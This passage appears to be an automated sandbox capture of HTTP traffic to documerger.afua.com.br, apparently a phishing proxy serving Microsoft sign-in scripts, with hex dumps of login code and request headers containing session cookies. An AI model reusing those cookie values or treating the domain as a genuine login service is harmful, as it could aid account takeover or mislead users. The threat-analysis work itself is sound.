                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:01 UTC139INHTTP/1.1 200 OK
                                                  Content-Length: 689017
                                                  Content-Type: application/x-javascript
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Connection: close
                                                  2024-11-27 17:10:01 UTC16245INData Raw: 0a 21 28 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 29 20 7b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 74 2c 20 69 2c 20 6f 20 3d 20 6e 5b 30 5d 2c 20 72 20 3d 20 6e 5b 31 5d 2c 20 73 20 3d 20 30 2c 20 63 20 3d 20 5b 5d 3b 20 73 20 3c 20 6f 2e 6c 65 6e 67 74 68 3b 20 73 2b 2b 29 0a 20 20 20 20 20 20 28 69 20 3d 20 6f 5b 73 5d 29 2c 0a 20 20 20 20 20 20 20 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 20 69 29 20 26 26 20 61 5b 69 5d 20 26 26 20 63 2e 70 75 73 68 28 61 5b 69 5d 5b 30 5d 29 2c 0a 20 20 20 20 20 20 20 20 28 61 5b 69 5d 20 3d 20 30 29 3b 0a 20 20 20 20 66 6f 72 20 28 74 20 69 6e 20 72 29 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f
                                                  Data Ascii: !(function (e) { function n(n) { for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++) (i = o[s]), Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]), (a[i] = 0); for (t in r) Object.proto
                                                  2024-11-27 17:10:01 UTC16384INData Raw: 6f 63 6b 65 64 3a 20 31 30 30 2c 0a 20 20 20 20 20 20 20 20 54 69 6c 65 73 3a 20 31 30 32 2c 0a 20 20 20 20 20 20 20 20 52 65 6d 6f 74 65 43 6f 6e 6e 65 63 74 3a 20 31 30 33 2c 0a 20 20 20 20 20 20 20 20 46 65 64 43 6f 6e 66 6c 69 63 74 3a 20 31 30 35 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 3a 20 31 30 36 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 5f 50 68 6f 6e 65 53 69 67 6e 69 6e 3a 20 31 30 37 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 46 69 6e 69 73 68 3a 20 31 30 38 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 53 74 72 6f 6e 67 41 75 74 68 3a 20 31 30 39 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 48 49 50 5f 4c 6f 67 69 6e 3a 20 31 31
                                                  Data Ascii: ocked: 100, Tiles: 102, RemoteConnect: 103, FedConflict: 105, Win10Host_Login: 106, Win10Host_Login_PhoneSignin: 107, Win10Host_Finish: 108, Win10Host_StrongAuth: 109, Win10Host_HIP_Login: 11
                                                  2024-11-27 17:10:01 UTC16384INData Raw: 20 28 50 52 4f 4f 46 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 54 79 70 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 45 6d 61 69 6c 3a 20 31 2c 0a 20 20 20 20 20 20 20 20 20 20 41 6c 74 45 6d 61 69 6c 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 53 4d 53 3a 20 33 2c 0a 20 20 20 20 20 20 20 20 20 20 44 65 76 69 63 65 49 64 3a 20 34 2c 0a 20 20 20 20 20 20 20 20 20 20 43 53 53 3a 20 35 2c 0a 20 20 20 20 20 20 20 20 20 20 53 51 53 41 3a 20 36 2c 0a 20 20 20 20 20 20 20 20 20 20 43 65 72 74 69 66 69 63 61 74 65 3a 20 37 2c 0a 20 20 20 20 20 20 20 20 20 20 48 49 50 3a 20 38 2c 0a 20 20 20 20 20 20 20 20 20 20 42 69 72 74 68 64 61 79 3a 20 39 2c 0a 20 20 20 20 20 20 20 20 20 20 54 4f 54 50 41 75 74 68 65 6e 74 69 63 61 74 6f 72 3a 20 31 30 2c 0a 20 20 20 20 20 20
                                                  Data Ascii: (PROOF = { Type: { Email: 1, AltEmail: 2, SMS: 3, DeviceId: 4, CSS: 5, SQSA: 6, Certificate: 7, HIP: 8, Birthday: 9, TOTPAuthenticator: 10,
                                                  2024-11-27 17:10:01 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 6e 20 7c 7c 20 22 22 20 3d 3d 3d 20 6e 20 7c 7c 20 28 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 50 2e 70 61 72 73 65 28 6e 29 3b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 71 75 65 72 79 20 3d 20 74 2e 71 75 65 72 79 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 20 3d 20 73 2e 66 69 6e 64 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 2e 71 75 65 72 79 2c 20 65 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 20 3f 20 74 2e 71 75 65 72 79 5b 69 5d 20 3a 20 22 22 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 46 72 6f 6d 43
                                                  Data Ascii: n || "" === n || (n = document.location.search); var t = P.parse(n); t.query = t.query || {}; var i = s.findOwnProperty(t.query, e, !0); return i ? t.query[i] : ""; }, appendOrReplaceFromC
                                                  2024-11-27 17:10:02 UTC16384INData Raw: 5d 2f 67 2c 0a 20 20 20 20 20 20 20 20 20 20 67 61 70 2c 0a 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 6e 74 2c 0a 20 20 20 20 20 20 20 20 20 20 6d 65 74 61 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 62 22 3a 20 22 5c 5c 62 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 74 22 3a 20 22 5c 5c 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 6e 22 3a 20 22 5c 5c 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 66 22 3a 20 22 5c 5c 66 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 72 22 3a 20 22 5c 5c 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 22 27 3a 20 27 5c 5c 22 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 5c 22 3a 20 22 5c 5c 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: ]/g, gap, indent, meta = { "\b": "\\b", "\t": "\\t", "\n": "\\n", "\f": "\\f", "\r": "\\r", '"': '\\"', "\\": "\\\\", },
                                                  2024-11-27 17:10:02 UTC16384INData Raw: 20 20 20 20 76 61 72 20 6d 20 3d 20 66 2e 61 64 64 28 64 2c 20 63 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 2e 74 61 72 67 65 74 55 72 6c 20 3d 20 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 61 2e 48 61 6e 64 6c 65 72 2e 63 61 6c 6c 28 6e 2c 20 70 29 2c 20 6e 2e 73 65 6e 64 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 2c 0a 20 20 20 20 20 20 20 20 28 6e 2e 42 65 61 63 6f 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 2c 20 69 2c 20 61 2c 20 6f 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 20 3d 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 76 28 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 70 2e 66 6f 72 45 61 63 68 28
                                                  Data Ascii: var m = f.add(d, c); p.targetUrl = m; } } a.Handler.call(n, p), n.sendRequest(); }), (n.Beacon = function (e, t, i, a, o) { var r = [], s = v(!0); p.forEach(
                                                  2024-11-27 17:10:02 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 6e 20 3f 20 28 6c 20 3d 3d 3d 20 70 2e 46 54 45 72 72 6f 72 20 3f 20 68 28 65 2c 20 64 29 20 3a 20 76 28 65 2c 20 64 29 29 20 3a 20 62 28 65 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 67 20 3d 20 22 22 29 2c 20 28 6c 20 3d 20 70 2e 45 72 72 6f 72 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 54 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 6c 20 3d 20 70 2e 54 69 6d 65 6f 75 74 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 28 67 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20
                                                  Data Ascii: n ? (l === p.FTError ? h(e, d) : v(e, d)) : b(e); } function k() { (g = ""), (l = p.Error), (u = ""), (f = ""), v(d); } function T() { (l = p.Timeout), (u = ""), (f = ""), (g = ""), v(d);
                                                  2024-11-27 17:10:02 UTC16384INData Raw: 3d 20 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 7b 20 63 72 65 64 54 79 70 65 3a 20 6d 2e 4f 6e 65 54 69 6d 65 43 6f 64 65 2c 20 70 72 6f 6f 66 3a 20 65 20 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 77 69 74 63 68 20 28 28 28 74 2e 70 72 6f 6f 66 2e 69 73 45 6e 63 72 79 70 74 65 64 20 3d 20 21 30 29 2c 20 65 2e 74 79 70 65 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 53 4d 53 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 56 6f 69 63 65 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 2e 69 73 56 6f 69 63 65 4f 6e 6c 79 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: = n) { var t = { credType: m.OneTimeCode, proof: e }; switch (((t.proof.isEncrypted = !0), e.type)) { case PROOF.Type.SMS: case PROOF.Type.Voice: if (!e.isVoiceOnly) {
                                                  2024-11-27 17:10:02 UTC16384INData Raw: 3d 20 70 2e 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 3f 22 20 2b 20 67 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 77 63 74 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4c 6f 67 69 6e 4f 70 74 69 6f 6e 73 25 33 44 33 25 32 36 22 20 2b 20 70 2e 65 78 74 72 61 63 74 28 22 77 63 74 78 22 2c 20 22 3f 22 20 2b 20 67 65 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 74 20 3d 20 74 2e 73 75 62 73 74 72 28 31 29 29 2c 20 28 65 20 3d 20 70 2e 61 70 70 65 6e 64 28 65 2c 20 74 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: = p.appendOrReplace( "?" + ge, "wctx", "LoginOptions%3D3%26" + p.extract("wctx", "?" + ge) ); (t = t.substr(1)), (e = p.append(e, t));
                                                  2024-11-27 17:10:02 UTC16384INData Raw: 20 20 28 65 2e 65 78 70 6f 72 74 73 20 3d 20 70 29 3b 0a 20 20 7d 2c 0a 20 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 76 61 72 20 69 20 3d 20 74 28 32 29 2c 0a 20 20 20 20 20 20 61 20 3d 20 74 28 31 29 2c 0a 20 20 20 20 20 20 6f 20 3d 20 74 28 34 29 2c 0a 20 20 20 20 20 20 72 20 3d 20 74 28 30 29 2c 0a 20 20 20 20 20 20 73 20 3d 20 77 69 6e 64 6f 77 2c 0a 20 20 20 20 20 20 63 20 3d 20 72 2e 44 69 61 6c 6f 67 49 64 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 6e 20 3d 20 74 68 69 73 2c 0a 20 20 20 20 20 20 20 20 74 20 3d 20 65 2e 69 73 50 6c 61 74 66 6f 72 6d 41 75 74 68 65 6e 74 69 63 61 74 6f 72 41 76 61 69 6c 61 62 6c 65 3b 0a 20 20 20 20 20 20 28 6e 2e 6f 6e 52 65 67
                                                  Data Ascii: (e.exports = p); }, function (e, n, t) { var i = t(2), a = t(1), o = t(4), r = t(0), s = window, c = r.DialogId; function d(e) { var n = this, t = e.isPlatformAuthenticatorAvailable; (n.onReg


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  75192.168.2.64979794.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:00 UTC1722OUTGET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:01 UTC1384INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Content-Type: application/x-javascript
                                                  content-length: 57510
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Sat, 26 Oct 2024 01:33:48 GMT
                                                  ETag: 0x8DCF55E3D91C34E
                                                  x-ms-request-id: 0de4e4f4-901e-0024-08d9-3f35f6000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171001Z-1544c49f7f8kzjrghC1ZRHgvdc0000000340000000002x3c
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                  2024-11-27 17:10:01 UTC10INData Raw: 1f 8b 08 00 00 00 00 00 00 03
                                                  Data Ascii:
                                                  2024-11-27 17:10:01 UTC16334INData Raw: dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 33 52 48 32 a2 09 14 c8 7e 04 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd f5 95 95 95 95 95 99 95 99 fd 87 f9 da 9f c6 5e e0 ef 89 fd 47 f5 bb 10 ec f9 fb 8f de 7c cf fb d1 ff 79 3f 14 f1 3a f4 0b f8 bb 24 3e ad 82 30 8e 5e 7d 74 c3 42 dc c0 57 8d 47 f9 ae fe f8 d9 f1 66 75 df 59 04 ee 4c cc ea 7f a8 7c 7e 25 9b 0a 6c 3a 75 17 8b bd 58 f5 e0 c4 4e f2 3b d8 87 07 6e d6 f8 43 39 29 f8 8c c3 78 8d 47 dd 51 50 5a 36 84 13 94 a6 0d 0f fe 5d 35 8a 45 27 d8 2b ef 7f de fb 31 99 86 13 38 1e 00 bf 57 dd 27 28 fd 86 b7 57 81 fe e1 cf e1 be 13 c2 9f a3 7d c7 6d 84 a5 51 1c 7a fe 4d f4
                                                  Data Ascii: }Ms#\@'F3RH2~Qx7}'}?e#QU]Vo^G|y?:$>0^}tBWGfuYL|~%l:uXN;nC9)xGQPZ6]5E'+18W'(W}mQzM


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  76192.168.2.64978813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:01 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:01 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 485
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                  ETag: "0x8DC582BB9769355"
                                                  x-ms-request-id: 352cddbf-b01e-005c-1563-404c66000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171001Z-174f7845968cpnpfhC1EWR3afc0000000wu000000000gf2w
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:01 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  77192.168.2.64979213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:01 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:01 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 411
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B989AF051"
                                                  x-ms-request-id: 49dfce9c-f01e-00aa-0974-408521000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171001Z-174f7845968j6t2phC1EWRcfe80000000x8000000000uc01
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:01 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  78192.168.2.64979013.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:01 UTC642OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 1028
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
